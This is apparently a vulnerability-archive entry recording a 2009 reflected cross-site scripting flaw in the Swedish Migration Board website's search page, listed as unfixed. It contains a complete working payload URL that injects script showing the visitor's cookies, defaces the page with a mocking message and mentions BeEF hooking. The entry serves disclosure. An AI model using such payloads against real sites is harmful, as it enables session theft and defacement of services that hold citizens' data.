Security researcher DellNull submitted a cross-site scripting (XSS) vulnerability affecting www.migrationsverket.se on 15/05/2009. At the time of submission the site ranked 87049 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 15/05/2009
Date published: 11/06/2009
Status: UNFIXED
Author: DellNull
Domain: www.migrationsverket.se
Category: XSS
Pagerank: 87049
URL: http://www.migrationsverket.se/java/search.jsp?query=%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+ Swedish+Migration+Board!\n%27%2Bdocument.cookie)%3B%3C%2Fscript%3E%3Cfont+color%3D%22red%22+size%3D% 22-1%22%3EThe+Swedish+Migration+Board!+%3Cbr%3E+Yeah%2C+that%27s+right%2C+don%27t+spend+money+on+sec urity+%2C+see+%3Ca+href+%3D%27http%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dmigrationsverket.se%27%3Ehttp% 3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dmigrationsverket.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+au thority+is+prone+to+security+flaws+in+their+systems!+What+if+someone+places+a+xss+proxy+hook+(like+B eEF)+here%3F+The+privacy+for+citizens+is+supposed+to+be+protected+by+constitutional+laws.+So+live+by +the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E-+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D%27http%3A% 2F%2Fwww.clipartguide.com%2F_named_clipart_images%2F0511-0809-2903-2813_Cartoon_African_American_Fam ily_Grocery_Shopping_clipart_image.jpg%27%3E%3C%2Ffont%3E&x=23&y=9